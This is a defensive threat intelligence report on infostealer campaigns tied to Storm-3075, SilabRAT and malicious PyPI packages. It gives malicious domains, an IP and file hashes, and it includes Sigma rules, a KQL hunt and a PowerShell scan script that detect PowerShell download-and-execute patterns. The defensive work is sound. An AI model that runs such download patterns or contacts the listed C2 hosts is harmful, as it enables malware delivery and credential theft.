A sophisticated wave of financially motivated credential theft campaigns has been identified targeting sectors including Education, Finance, Technology, and Bioinformatics. The activity centers around the distribution of multiple infostealer families—Vidar, Lumma Stealer, SilabRAT, and RustyStealer—facilitated by diverse attack vectors.

The primary actor, Storm-3075, is exploiting the global AI hype by impersonating brands like ChatGPT and Copilot to deliver Vidar and Lumma via malvertising and SEO poisoning. Simultaneously, threat actor o1oo1 is actively marketing the advanced SilabRAT on the dark web, featuring HVNC and browser profile cloning. In a parallel supply chain attack, malicious Python packages (Mini Shai-Hulud, Miasma, Hades) are targeting developers via PyPI and npm. Furthermore, social media platforms (TikTok) are being abused to distribute Vidar through fake software tutorials, while the modular Needle C2 platform specifically targets cryptocurrency wallets.

The collective objective is the exfiltration of session cookies, cryptocurrency wallet keys, and system credentials to enable financial fraud and unauthorized access.

Threat Actor / Malware Profile

Storm-3075 & Vidar/Lumma Campaign

Distribution: Social engineering via fake AI branding (ChatGPT, DeepSeek), malvertising, and SEO-driven search result poisoning.
Payload Behavior: Vidar and Lumma Stealers focus on harvesting browser data, saved passwords, and cryptocurrency wallets. Hijack Loader is used as a shellcode loader to execute payloads.
C2 Communication: HTTP/HTTPS based C2 utilizing domain generation algorithms or hardcoded domains (e.g., brokeapt.com).
Persistence: Scheduled tasks or registry run keys established via the initial loader.

SilabRAT (Actor: o1oo1)

Distribution: Malware-as-a-Service (MaaS) sold for $5,000/month on dark web forums.
Payload Behavior: Advanced RAT featuring Hidden Virtual Network Computing (HVNC) for invisible remote control, browser profile cloning to bypass MFA, and session hijacking.
C2 Communication: Encrypted communication to bulletproof-hosted infrastructure (IP: 91.199.163.124).
Anti-Analysis: Uses AsmCrypt for obfuscation and may employ anti-debugging techniques common in MaaS offerings.

PyPI Supply Chain (Hades, Miasma, Mini Shai-Hulud)

Distribution: Typosquatting and malicious packages in PyPI/npm targeting bioinformatics and MCP developers.
Payload Behavior: Malicious .pth hooks and trojanized native .abi3.so extensions execute upon import. Used to establish persistence and download secondary payloads.
Persistence: Python startup scripts and compromised development environments.

Needle / RustyStealer

Distribution: Crypto-focused campaigns targeting browser extensions and desktop wallet users.
Payload Behavior: Browser extension spoofing (MetaMask, Phantom) and desktop impersonation (Exodus, Ledger).
Objective: Direct theft of cryptocurrency keys and wallet spoofer mechanisms.

IOC Analysis

The provided indicators include:

File Hashes (SHA1/SHA256): Specific signatures for the malware loaders (Hijack Loader, SilabRAT), payloads (Vidar, Lumma), and supply chain artifacts (Miasma, Hades). SOC teams should use EDR solutions to query these hashes across endpoints.
Domains: C2 domains (msget.run, d4ug.site, brokeapt.com) used for payload delivery and callback. These should be blocked at the perimeter and DNS level.
IPv4: 91.199.163.124 associated with SilabRAT C2 infrastructure.
Operationalization: Push domains to firewalls/proxies. Configure SIEM to alert on DNS requests to these domains. Use EDR to hunt for the specific file hashes.

Detection Engineering

YAML

---
title: Potential Vidar Stealer Execution via PowerShell
description: Detects execution patterns associated with Vidar Stealer distribution via fake tutorials or AI bait, involving PowerShell downloading payloads from suspicious domains.
status: experimental
date: 2026/06/12
author: Security Arsenal
references:
  - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
tags:
  - attack.execution
  - attack.t1059.001
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_domain:
    CommandLine|contains:
      - 'msget.run'
      - 'd4ug.site'
      - 'brokeapt.com'
  condition: selection and selection_domain
falsepositives:
  - Legitimate software installation scripts
level: high
---
title: SilabRAT MaaS C2 Traffic
description: Detects network connections to known SilabRAT C2 infrastructure or patterns consistent with its HVNC tunneling.
status: experimental
date: 2026/06/12
author: Security Arsenal
references:
  - https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/
tags:
  - attack.command_and_control
  - attack.t1071
logsource:
  category: network_connection
  product: windows
detection:
  selection_ip:
    DestinationIp|contains:
      - '91.199.163.124'
  selection_port:
    DestinationPort: 443
  condition: selection_ip and selection_port
falsepositives:
  - Rare legitimate traffic to this IP
level: critical
---
title: Malicious PyPI Package Import (Miasma/Hades)
description: Detects execution of Python processes importing suspicious libraries associated with the Mini Shai-Hulud, Miasma, or Hades campaigns.
status: experimental
date: 2026/06/12
author: Security Arsenal
references:
  - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious
tags:
  - attack.initial_access
  - attack.t1195.001
  - attack.execution
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
  selection_cli:
    CommandLine|contains:
      - 'import miasma'
      - 'import hades'
      - 'import shai'
      - '.pth'
  condition: selection_python and selection_cli
falsepositives:
  - Legitimate development work (verify package names)
level: high


kql
// Hunt for Vidar/SilabRAT Network IOCs and PowerShell download activity
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ('msget.run', 'd4ug.site', 'brokeapt.com', 'pan.rongtv.xyz', 'pan.ssffaa19.xyz') 
   or RemoteIP == '91.199.163.124'
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend HuntContext = 'Infostealer C2 or Payload Delivery'
;
Union DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any ('Invoke-WebRequest', 'DownloadString', 'IEX') 
   and (ProcessCommandLine has 'msget.run' or ProcessCommandLine has 'd4ug.site')
| project Timestamp, DeviceName, AccountName, ProcessCommandLine,FolderPath
| extend HuntContext = 'Vidar Stealer PowerShell Loader'


powershell
# IOC Hunt Script for Infostealer Campaigns
# Checks for specific file hashes and known malicious file paths

$TargetHashes = @(
    "4f5c5b3ef45cfff7721754487a86aeff9a2e6e32",
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623",
    "fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023",
    "6506d31707a39949f89534bf9705bcf889f1ecae3dbc6f4ff88d67a8be3d01b2",
    "6d332f814f15f19758d65026bbfd0a8c49671b319ec77b8fa1b27fc48afff7d9",
    "0d681bd160db1b1df5db321a6d2dd9ae81b2609b"
)

$SuspiciousPaths = @(
    "$env:APPDATA\*",
    "$env:TEMP\*",
    "$env:USERPROFILE\Downloads\*"
)

Write-Host "[+] Starting Scan for Infostealer IOCs..."

foreach ($Path in $SuspiciousPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | Get-FileHash -Algorithm SHA256, SHA1 -ErrorAction SilentlyContinue | Where-Object {
            $TargetHashes -contains $_.Hash
        } | ForEach-Object {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.Path) | HASH: $($_.Hash)"
        }
    }
}

# Check for DNS cache entries related to C2 domains
$Domains = @("msget.run", "d4ug.site", "brokeapt.com", "pan.rongtv.xyz")
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue

foreach ($Domain in $Domains) {
    if ($DnsCache.Name -like "*$Domain*") {
        Write-Host "[!] SUSPICIOUS DNS ENTRY FOUND: $Domain"
    }
}

Write-Host "[+] Scan Complete."


# Response Priorities

*   **Immediate:**
    *   Block all identified domains (`msget.run`, `d4ug.site`, `brokeapt.com`, `pan.rongtv.xyz`) and IP address (`91.199.163.124`) on firewalls and proxies.
    *   Scan endpoints for the provided SHA1/SHA256 hashes.
    *   Identify and quarantine systems exhibiting PowerShell web-request behavior to the listed domains.

*   **24 Hours:**
    *   Conduct credential resets for users on devices flagged with IOC matches.
    *   Review browser extension logs for unauthorized installations related to crypto wallets (MetaMask, Phantom, Trust Wallet) indicative of "Needle" activity.
    *   Audit Python/PyPI package usage in developer environments for the malicious packages listed.

*   **1 Week:**
    *   Implement application controls to restrict unsigned PowerShell scripts and binary execution from user directories.
    *   Enforce strict allow-listing for PyPI/npm repositories and developers.
    *   Provide security awareness training focused on AI-themed social engineering and software cracks distributed via social media.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

Storm-3075 AI Hype & SilabRAT MaaS: Multi-Vector Infostealer Surge & PyPI Supply Chain Compromise